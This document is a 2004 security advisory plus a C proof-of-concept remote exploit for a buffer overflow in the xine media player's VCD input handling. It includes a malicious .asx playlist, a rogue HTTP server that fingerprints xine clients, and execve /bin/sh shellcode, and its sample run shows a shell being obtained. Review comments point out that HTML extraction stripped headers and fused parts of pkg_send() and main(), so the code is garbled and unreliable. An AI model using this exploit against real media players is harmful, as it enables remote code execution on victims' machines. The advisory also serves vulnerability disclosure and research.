Xine 0.99.x vcd input identifier management Remote Exploit


                        
 /*
  *********************************************************************
  $ An open security advisory #6 - Xine vcd MRL input identifier management overflow
  *********************************************************************
  1: Bug Researcher: c0ntex[at]open-security.org
  2: Bug Released: August 08th 2004
  3: Bug Impact Rate: Medium / High
  4: Bug Scope Rate: Remote / Local
  *********************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *********************************************************************

   open-security org advisories 6

   An example malicious .asx file:

   sunscreen$ cat open-security.asx
   
   Open Security Media Archive
   Brought to you by c0ntex[at]open-security.org
        
         SongList:
         Track 1 - Open Security Rock(s) -> SOAD  - Chop Suey
         Track 2 - Open Security Rock(s) -> Media Mayhem Militia
        
                
                System Of A Down - Chop Suey
                c0ntex[at]open-security.org
                ©2004
                
                
                
                All your media are belong to us!
                c0ntex[at]open-security.org
                ©2004
                
                
   
   sunscreen$ 

   ---

   Example POC run:

   sunscreen$ gcc -o xinesmine xinesmine.c -lsocket -lnsl
   sunscreen$ ./xinesmine -a 0 -p 80
 
      **  Xines_Mine - Remote proof of concept example  **
 
   [-] Uses .asx header reference to make Xine think it has valid
   [-] reference file, then a crafted package is sent to overflow
   [-] the vulnerable client && prove remote exploit concept.
   [-] c0ntex[at]open-security.org {} http://www.open-security.org
 
    -> Listening for a connection on port 80


   [c0ntex@exploited xine]$ ./xine --no-splash http://sunscreen/opensecurity.asx
   This is xine (X11 gui) - a free video player v0.99.2.
   (c) 2000-2004 The xine Team.
   Playlist file (http://sunscreen/opensecurity.asx) is invalid.
   WARN: could not retrieve file info for `image.nrg': No such file or directory
   WARN: init failed
   WARN: open(



                                                                    1?Ph//shh/bin??PS??1¿':
   File name too long
   WARN: could not retrieve file info for `




                                                                    1?Ph//shh/bin??PS??1¿':
   File name too long
   WARN: init failed
   bash-2.05$ 

   ---
    
   CVS log which details the bug perfectly can be found here:

        -> http://sourceforge.net/mailarchive/forum.php?thread_id=5143955&forum_id=11923


   Get the latest CVS of Xine-lib from here:

        -> http://xinehq.de/index.php/releases


   Get the Xine (XSA) advisory from here:

        -> http://xinehq.de/index.php/security


   Get this original advisory from here:

        -> http://www.open-security.org/advisories/advisories.html

  ---
 
  Xine bug discovered 22nd May 2004
  Xine bug research completed 24th May 2004
  Xine developers contacted 11th July 2004
  Xine bug public release 8th August 2004
 

  cheers
  c0ntex[at]open-security.org
  http://www.open-security.org

 */



/* NOTE(review): every #include below has lost its header name. This listing
 * was extracted from HTML and all text between a '<' and the next '>' is
 * gone; the same damage truncates pkg_send() and the head of main() further
 * down, so the file as shown does not compile. The calls the file makes
 * require at least <stdio.h>, <stdlib.h>, <string.h>, <unistd.h>,
 * <sys/socket.h>, <netinet/in.h> and <arpa/inet.h>. */
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* `linux` is only predefined by GCC in GNU mode; `__linux__` is the
 * portable spelling. The header name here is missing as well. */
#ifdef linux
 #include 
#endif


/* Process exit / return codes used by die() and main(). */
#define SUCCESS 0
#define FAILURE 1

/* BUFFER: size of the static buffer pkg_send() fills (see prepsock()).
 * CDATA:  size of the buffer the client's first bytes are read into.
 * JMP:    offset subtracted from BUFFER to get the fill loop's start index. */
#define BUFFER  1044
#define CDATA   150
#define JMP     200

/* THREAT is the substring prepsock() looks for in the client's request to
 * decide it is talking to the targeted xine build. XPLOIT_OS is not
 * referenced anywhere else in the visible listing. */
#define THREAT  "xine/1-rc5"
#define XPLOIT_OS Redhat9


/* Usage text. NOTE(review): as shown, the format string has no conversion
 * specifier, so OhNoo is passed but never printed (the argument placeholders
 * were presumably lost with the stripped '<...>' text). The trailing ';' is
 * part of the expansion. */
#define example(OhNoo)  fprintf(stderr, "Usage: ./xines_mine -a  -p \n\n", OhNoo);


/* Forward declarations for the functions defined below. */
void die(char * errtrap);
void banner(void);
int prepsock(int align_stack, int port);
int pkg_send(int clisock_fd, int align_stack, char * pload, char * payload);
int main(int argc, char ** argv);


/* Canned HTTP/1.0 response header, one element per line, ending with the
 * blank line that closes the header block. NOTE(review): Date and
 * Content-Length are fixed literals — the length is not derived from what is
 * actually written to the client. The elements point at string literals, so
 * `static const char *const` would be the honest declaration. */
static char * http[] = {
        "HTTP/1.0 200 OK\r\n",
        "Date: Thu, 23 May 2004 12:52:15 GMT\r\n",
        "Server: Xines_Mine Server(Linux)\r\n",
        "MIME-version: 1.0\r\n",
        "Content-Type: audio/x-mpegurl\r\n",
        "Content-Length: 2000\r\n",
        "Connection: close\r\n",
        "\r\n"
};
 

/* Text lines of the playlist body. NOTE(review): the elements that are just
 * "\r\n" were markup lines whose angle-bracketed tags were stripped when this
 * listing was extracted from HTML (the .asx sample in the header comment
 * suffered the same), so the structure that made this an .asx document is
 * not visible here. Same `const` remark as for `http`. */
static char * vcdmuxor[] = {
        "\r\n",
        "Xines_Mine\r\n",
        " c0ntex[at]open-security.org www.open-security.org\r\n",
        "\r\n",
        "\r\n",
        "\r\n",
        "\r\n",
        "\r\n"
};

 
/* Hard-coded payload bytes. prepsock() takes their address as `pload` and
 * hands it to pkg_send(); they are left as opaque data here. */
static char opcode[] =  "\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
                                 "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
                                 "\x80\x31\xc0\x31\xdb\xfe\xc0\xcd\x80";


/*
 * Report `errtrap` via perror() (so the current errno text is appended) and
 * terminate the process immediately with status FAILURE. Uses _exit(), so
 * stdio buffers are not flushed and atexit handlers do not run. Never returns.
 */
void
die(char * errtrap)
{
        const char *what = errtrap;

        perror(what);
        _exit(FAILURE);
}
 

/*
 * Write the tool's introductory banner to stderr, one fixed line at a time.
 * No parameters, no return value, no state touched beyond stderr.
 */
void
banner(void)
{
        static const char *const lines[] = {
                "\n   **  Xines_Mine - Remote proof of concept example  **\n\n",
                "[-] Uses .asx header reference to make Xine think it has valid\n",
                "[-] reference file, then a crafted package is sent to overflow\n",
                "[-] the vulnerable client && prove remote exploit concept.\n",
                "[-] c0ntex[at]open-security.org {} http://www.open-security.org  \n\n",
        };
        size_t k;

        /* none of the lines contains a '%', so fputs is equivalent to fprintf */
        for (k = 0; k < sizeof lines / sizeof lines[0]; k++) {
                fputs(lines[k], stderr);
        }
}
 
 
/*
 * Bind a TCP listener on INADDR_ANY:`port`, accept exactly one client, check
 * that the first bytes it sends contain THREAT, then hand the connection to
 * pkg_send(). Every setup failure goes through die(), which terminates the
 * process, so the function only returns on the success path.
 *
 * @param align_stack  passed through to pkg_send() and echoed in a log line
 * @param port         TCP port to listen on
 * @return the client descriptor number (already closed by then, see below)
 *
 * NOTE(review): several C defects are marked inline; this is a doc-only pass,
 * so the code is left as it is.
 */
int
prepsock(int align_stack, int port)
{
      /* NOTE(review): clisock_fd and recv_chk are unsigned, so the -1 that
       * accept() and recv() return on failure cannot be tested as -1. */
      unsigned int cl_buf, recv_chk, reuse = 1;
      unsigned int clisock_fd;

      signed int sock_fd;

      /* chk_vuln receives the client's first bytes; payload is the scratch
       * buffer pkg_send() fills. Both are static, hence zero on first use. */
      static char chk_vuln[CDATA];
      static char payload[BUFFER];

      struct sockaddr_in victimised, xine;

      /* Address of the hard-coded payload bytes, forwarded to pkg_send(). */
      char *pload = (char *) &opcode;


      /* socket(), SO_REUSEADDR and the zeroing of `xine` chained through ?: .
       * NOTE(review): the chain mixes a void operand (die) with a void *
       * operand (memset), which C does not permit — compilers may only warn. */
      ((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
      ? die("Could not create socket")
      : (setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, &reuse, sizeof(int)) == -1)
            ? die("Could not re-use socket")
                : memset(&xine, 0, sizeof(xine));
 
      xine.sin_family = AF_INET;
      xine.sin_port = htons(port);
      xine.sin_addr.s_addr = htonl(INADDR_ANY);  /* all local interfaces */
 
      if(bind(sock_fd, (struct sockaddr *)&xine, sizeof(struct sockaddr)) == -1) {
        close(sock_fd); die("Could not bind socket");
      }
 
      /* backlog 0: what queue length that yields is implementation-defined */
      if(listen(sock_fd, 0) == -1) {
              close(sock_fd); die("Could not listen on socket");
      }
 

      printf(" -> Listening for a connection on port %d\n", port);
 

      /* Blocks until one client connects. NOTE(review): accept() reports
       * failure as -1, but the test below only catches a result of 0. */
      cl_buf = sizeof(victimised);
      clisock_fd = accept(sock_fd, (struct sockaddr *)&victimised, &cl_buf);

      if(!clisock_fd) {
        die("Could not accept connection\n");
      }

      /* NOTE(review): inverted — close() returns 0 on success, so this warns
       * on the success path and stays silent when close() actually fails. */
      if(!close(sock_fd)) {
        fprintf(stderr, "Could not close socket\n");
      }


      fprintf(stderr, " -> Action: Attaching from host [%s]\n", inet_ntoa(victimised.sin_addr));
      fprintf(stderr, " -> Using align [%d] and port [%d]\n", align_stack, port);
 

      //memset(chk_vuln, 0, CDATA);
      memset(chk_vuln, 0, sizeof(chk_vuln));
 
      /* Single recv() of at most CDATA bytes, no loop.
       * NOTE(review): the terminator is stored before the result is checked,
       * and at index recv_chk+1 rather than recv_chk. When recv() fills the
       * whole buffer that index is two bytes past the end of chk_vuln and no
       * NUL remains inside it, so the strstr() below runs past the buffer;
       * when recv() returns -1 the unsigned wrap makes the index 0. */
      recv_chk = recv(clisock_fd, chk_vuln, sizeof(chk_vuln), 0);
      chk_vuln[recv_chk+1] = '\0';
 
      /* Only logs; execution continues with an empty buffer. */
      if((recv_chk == -1) || (recv_chk == 0)) {
              fprintf(stderr, "Could not receive data from client\n");
      }
 
      /* Client fingerprint: THREAT must occur somewhere in what was read. */
      if(strstr(chk_vuln, THREAT)) {
              fprintf(stderr, " -> Detected vulnerable Xine version\n");
      }else{
              fprintf(stderr, " -> Detected a non-Xine connection, end.\n");
                  close(clisock_fd); die("Ending connection, not a Xine client\n");
      }

      /* pkg_send() returning 1 is treated as a send failure. */
      if(pkg_send(clisock_fd, align_stack, pload, payload) == 1) {
              fprintf(stderr, "Could not send package\n");
              close(clisock_fd); die("Could not send package!\n");
      }

      if(close(clisock_fd) != 0) {
                fprintf(stderr, "Could not close socket\n");
        }

      /* NOTE(review): returns the descriptor number just closed. main()
       * compares the result with -1, which this path can never produce, so
       * its "Error" branch is effectively dead. */
      return clisock_fd;
      //return SUCCESS;
}
 
 
/*
 * Zero `payload` (BUFFER bytes), fill it starting at BUFFER - JMP +
 * align_stack, and write it to `clisock_fd`. `pload` points at the opcode
 * bytes. The caller treats a return value of 1 as a send failure; the return
 * statements themselves are in the text that is missing from this listing.
 *
 * NOTE(review): this listing is damaged — all text between a '<' and the
 * next '>' was dropped by HTML extraction (compare the empty #include
 * lines). The fill loop's condition and body, the send loop, the end of this
 * function and the whole head of main() up to the 'a' option case are gone,
 * so the block below is really the tail of pkg_send() fused with the tail of
 * main(); it does not compile as shown.
 */
int
pkg_send(int clisock_fd, int align_stack, char * pload, char * payload)
{
        unsigned int i = 0;
 
        memset(payload, 0, BUFFER);
 
        /* NOTE(review): garbled — the for-loop and the fprintf that reports
         * the payload size are fused on one line. Also, "%4d" is given a
         * size_t (strlen), which is a format/argument mismatch. */
        for(i = (BUFFER - JMP + align_stack); i  Payload size to send is [%4d]\n", strlen(payload));
        fprintf(stderr, " -> Sending evil payload to our client\n");       fflush(stderr);


        /* NOTE(review): garbled — from here the send loop, the rest of
         * pkg_send() and the beginning of main() (argument parsing up to the
         * 'a' case's range check) are missing. What follows is the end of
         * main()'s option switch; `port`, `align_stack` and `exploit` are
         * presumably declared in the missing part. */
        for (i = 0; i  3)) {
                                        goto jumpout;
                                }
                                break;
                        case 'p':
                                port = atoi(optarg);
                                /* NOTE(review): the lower bound of this range
                                 * check was lost to the same garbling. */
                                if((port  65535)) {
                                        goto jumpout;
                                }
                                break;
                        default:
                                goto jumpout;
                                break;
                        }
        }
 
        /* NOTE(review): prepsock() calls die() on every failure path it
         * shows and returns a closed descriptor number otherwise, so a -1
         * here is effectively unreachable. */
        if(prepsock(align_stack, port) == -1) {
                fprintf(stderr, "Error\n");
                _exit(FAILURE);
        } fprintf(stderr, " -> Test complete\n\n");

        return EXIT_SUCCESS;

        /* Usage path: banner, then the example() macro, exit status 1. */
        jumpout:
                banner();
                example(exploit);
                return EXIT_FAILURE;
}
